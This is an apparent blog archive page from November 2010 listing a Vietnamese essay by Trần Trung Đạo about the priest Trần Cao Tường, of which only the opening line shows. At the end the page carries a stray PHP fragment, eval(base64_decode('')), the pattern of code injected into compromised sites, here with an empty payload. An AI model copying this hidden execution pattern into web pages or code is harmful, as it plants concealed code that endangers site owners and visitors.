Archive for November 23rd, 2010

Trần Trung Đạo: Linh mục Trần Cao Tường, từ đồi Masada đến bờ sông Hát

Trần Trung Đạo: Linh mục Trần Cao Tường, từ đồi Masada đến bờ sông Hát

(Đền Hát Môn, ảnh Lm Trần Cao Tường)Quan hệ giữa người và người trong cuộc sống được đan kết bằng những sợi nhân duyên bắt đầu là hạnh ngộ rồi chấm dứt ở chia tay. Và tôi đang bước vào một lứa tuổi có nhiều chia tay hơn h

11.23.2010 | Ký-Truyện-Tùy Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>